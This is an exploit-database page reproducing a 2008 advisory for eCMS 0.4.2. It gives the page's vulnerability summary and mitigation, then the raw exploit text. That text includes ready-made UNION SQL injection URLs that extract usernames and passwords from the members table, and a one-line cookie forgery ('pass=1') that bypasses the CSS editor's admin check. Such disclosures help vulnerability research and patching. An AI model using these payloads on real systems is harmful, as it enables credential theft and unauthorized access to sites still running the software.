header-logo
Suggest Exploit
vendor:
eCMS
by:
Virangar Security Team
9.3
CVSS
HIGH
SQL Injection & Remote Permission Bypass Vulnerability
89, 614
CWE
Product Name: eCMS
Affected Version From: 2000.4.2
Affected Version To: 2000.4.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'p' GET parameter to '/index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Also, the vulnerability exists due to insecure cookie handling in '/editCss.php' script. A remote attacker can set the 'pass' cookie to '1' and gain access to the page.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Also, the application should properly handle cookies.
Source

Exploit-DB raw data:

  #######################################################################################
  #                                                                                     #
  #         ...::::eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities  ::::...        #          
  #######################################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----
1.sql injection:
-------vuln codes in:-----------
index.php:
line 52:$p = $_GET['p']
..
..
line 55:$query = "SELECT * FROM files WHERE cat = '$p' ORDER BY date DESC";
---
exploit:
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*
or
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*
#####################
2. Remote Permission Bypass Vulnerability(Insecure Cookie Handling ):
-------vuln codes in:-----------
editCss.php:

line 17:if(!isset($_COOKIE['pass']))
{
  echo('You\'re not allowed to come here! <a href=admin.php>Go back!</a>');
} else {
....
...
...
-------
/*
if the cookie didn't set for you, you can't allow to see this page..but if we do somethings :) such as :

javascript:document.cookie = "pass=1; path=/";

now the cookie is set for you, and you can allow to see the page and edit the CSS in file "style.css"
*/
exploit:
just open your browser and then type:
javascript:document.cookie = "pass=1; path=/";
now see the "editCss.php" and edit the cms CSS :D
-----
young iranian h4ck3rz

# milw0rm.com [2008-05-20]

Navigation

Suggest Exploit

Services By CQR